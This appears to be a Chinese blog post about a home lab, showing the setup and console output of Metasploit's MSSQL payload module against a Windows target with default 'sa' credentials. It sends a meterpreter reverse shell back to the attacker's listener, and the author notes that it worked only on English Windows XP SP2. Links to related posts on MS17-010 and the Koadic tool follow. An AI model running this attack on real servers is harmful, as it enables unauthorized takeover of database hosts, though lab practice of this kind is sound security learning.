在kali上做metasploit实验,步骤如下:

msf5 exploit(windows/mssql/mssql_payload) > show options

Module options (exploit/windows/mssql/mssql_payload):

   Name                 Current Setting  Required  Description

   ----                 ---------------  --------  -----------

   METHOD               cmd              yes       Which payload delivery method to use (ps, cmd, or old)

   PASSWORD             sa               no        The password for the specified username

   RHOSTS               192.168.0.20     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

   RPORT                1433             yes       The target port (TCP)

   SRVHOST              0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0

   SRVPORT              8080             yes       The local port to listen on.

   SSL                  false            no        Negotiate SSL for incoming connections

   SSLCert                               no        Path to a custom SSL certificate (default is randomly generated)

   TDSENCRYPTION        false            yes       Use TLS/SSL for TDS data "Force Encryption"

   URIPATH                               no        The URI to use for this exploit (default is random)

   USERNAME             sa               no        The username to authenticate as

   USE_WINDOWS_AUTHENT  false            yes       Use windows authentification (requires DOMAIN option set)

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description

   ----      ---------------  --------  -----------

   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)

   LHOST     192.168.0.22     yes       The listen address (an interface may be specified)

   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name

   --  ----

   0   Automatic

msf5 exploit(windows/mssql/mssql_payload) > exploit

[*] Started reverse TCP handler on 192.168.0.22:4444

[*] 192.168.0.20:1433 - The server may have xp_cmdshell disabled, trying to enable it...

[*] 192.168.0.20:1433 - Command Stager progress -   1.47% done (1499/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -   2.93% done (2998/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -   4.40% done (4497/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -   5.86% done (5996/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -   7.33% done (7495/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -   8.80% done (8994/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -  10.26% done (10493/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -  11.73% done (11992/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -  13.19% done (13491/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -  14.66% done (14990/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -  16.13% done (16489/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -  17.59% done (17988/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -  19.06% done (19487/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -  20.53% done (20986/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -  21.99% done (22485/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -  23.46% done (23984/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -  24.92% done (25483/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -  26.39% done (26982/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -  27.86% done (28481/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -  29.32% done (29980/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -  30.79% done (31479/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -  32.25% done (32978/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -  33.72% done (34477/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -  35.19% done (35976/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -  36.65% done (37475/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -  38.12% done (38974/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -  39.58% done (40473/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -  41.05% done (41972/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -  42.52% done (43471/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -  43.98% done (44970/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -  45.45% done (46469/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -  46.91% done (47968/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -  48.38% done (49467/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -  49.85% done (50966/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -  51.31% done (52465/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -  52.78% done (53964/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -  54.24% done (55463/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -  55.71% done (56962/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -  57.18% done (58461/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -  58.64% done (59960/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -  60.11% done (61459/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -  61.58% done (62958/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -  63.04% done (64457/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -  64.51% done (65956/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -  65.97% done (67455/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -  67.44% done (68954/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -  68.91% done (70453/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -  70.37% done (71952/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -  71.84% done (73451/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -  73.30% done (74950/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -  74.77% done (76449/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -  76.24% done (77948/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -  77.70% done (79447/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -  79.17% done (80946/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -  80.63% done (82445/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -  82.10% done (83944/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -  83.57% done (85443/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -  85.03% done (86942/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -  86.50% done (88441/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -  87.96% done (89940/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -  89.43% done (91439/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -  90.90% done (92938/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -  92.36% done (94437/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -  93.83% done (95936/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -  95.29% done (97435/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -  96.76% done (98934/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -  98.19% done (100400/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress -  99.59% done (101827/102246 bytes)

[*] 192.168.0.20:1433 - Command Stager progress - 100.00% done (102246/102246 bytes)

[*] Exploit completed, but no session was created.

msf5 exploit(windows/mssql/mssql_payload) >

让人闹心的是最后一句话

Exploit completed, but no session was created.

三板斧打完,无法返回shell,我尝试了好多方法,更换靶机操作系统,更换metasploit版本,无论怎么折腾都不行,最后从书上找到答案,靶机要使用windows xp sp2英文版本的,重要事情要说三遍“英文版”、“英文版”、“英文版”。
更换完毕后,果然成功返回了shell。至于其他系统,尤其中文版的,我就不知道怎么搞了。

Exploit completed, but no session was created.的更多相关文章

  1. UI自动化执行时报Parent suite setup failed: SessionNotCreatedException: Message: session not created: This version of ChromeDriver only supports Chrome version 81报错的问题解决

    持续集成在执行UI时报错:Parent suite setup failed: SessionNotCreatedException: Message: session not created: Th ...

  2. Selenium chromeDriver启动时报错:session not created: This version of ChromeDriver only supports Chrome

    解决方案: 这是因为ChromeDriver与本地chrome浏览器的版本不一致导致 ChromeDriver下载地址:http://npm.taobao.org/mirrors/chromedriv ...

  3. 渗透杂记-2013-07-13 windows/mssql/mssql_payload

    扫描一下 Starting Nmap 5.30BETA1 ( http://nmap.org ) at 2011-05-06 09:36 中国标准时间 NSE: Loaded 49 scripts f ...

  4. 《Metasploit魔鬼训练营》第四章(下)

    p163 XSSF 默认kali 2.0中没有xssf,先下载:https://code.google.com/archive/p/xssf/downloads 将下载下来的zip文件解压,将其中的d ...

  5. 2018-2019-2 20165234 《网络对抗技术》 Exp5 MSF基础应用

    实验五 MSF基础应用 实验内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 1.一个主动攻击实践,ms08_067(成功) 2. 一个针对浏览器 ...

  6. MSF里MS17_010利用模块笔记

    1.   auxiliary/scanner/smb/smb_ms17_010      //扫描检测漏洞辅助模块 扫描结果这里可以看到 2,3,4这几台主机存在此漏洞! 2.     auxilia ...

  7. 使用metasploit进行栈溢出攻击-5

    我们先尝试使用这个脚本进行攻击: msf > use exploit/linux/myvictim msf exploit(myvictim) > set payload linux/x8 ...

  8. MSF系列--MS17_010利用模块笔记

    1.   auxiliary/scanner/smb/smb_ms17_010      //扫描检测漏洞辅助模块 扫描结果这里可以看到 2,3,4这几台主机存在此漏洞! 2.     auxilia ...

  9. 有趣的后渗透工具 Koadic

    koadic是DEFCON黑客大会上分享出来的的一个后渗透工具,虽然和msf有些相似,但是Koadic主要是通过使用Windows ScriptHost(也称为JScript / VBScript)进 ...

随机推荐

  1. HashMap与HashTable的理解与区别

    Hashtable是java一开始发布时就提供的键值映射的数据结构,而HashMap产生于JDK1.2.虽然Hashtable比HashMap出现的早一些,但是现在Hashtable基本上已经被弃用了 ...

  2. [TJOI2015]弦论(第k小子串)

    题意: 对于一个给定的长度为n的字符串,求出它的第k小子串. 有参数t,t为0则表示不同位置的相同子串算作一个,t为1则表示不同位置的相同子串算作多个. 题解: 首先,因为t的原因,后缀数组较难实现, ...

  3. 007_硬件基础电路_RC复位电路中二极管的作用

    --------------------- 作者:碎碎思 来源:CSDN 原文:https://blog.csdn.net/Pieces_thinking/article/details/781110 ...

  4. SQLServer函数 left()、charindex()、stuff()

    SQLServer函数 left().charindex().stuff()的使用 1.left()LEFT (<character_expression>, <integer_ex ...

  5. Convert AS400 Spool to PFD Tools – PDFing

    1. Steps There’s a tool PDFing convert spool file to PDF with simple way. No need install AS400 obje ...

  6. learning scala for comprehensions

    code: package com.aura.scala.day01 object forComprehensions { def main(args: Array[String]): Unit = ...

  7. Python之yield语法

    生成器与yield 函数使用yield关键字可以定义生成器对象.生成器是一个函数.它生成一个值的序列,以便在迭代中使用,例如: def countdown(n): print('倒计时:%s' % n ...

  8. NetworkX系列教程(10)-算法之二:最小/大生成树问题

    小书匠 Graph 图论  重头戏部分来了,写到这里我感觉得仔细认真点了,可能在NetworkX中,实现某些算法就一句话的事,但是这个算法是做什么的,用在什么地方,原理是怎么样的,不清除,所以,我决定 ...

  9. 宏任务、微任务与Event Loop

    说到宏任务和微任务,我们就不得不提 Event Loop 了 JS的本质是单线: 1. 一般来说,非阻塞性的任务采取同步的方式,直接在主线程的执行栈完成. 2. 一般来说,阻塞性的任务都会采用异步来执 ...

  10. Ubuntu14.04 软件安装卸载

    ----常用软件安装 sudo apt-get install vim-gtk //安装vim软件 sudo apt-get install zip //安装解压软件和解压文件 sudo apt-ge ...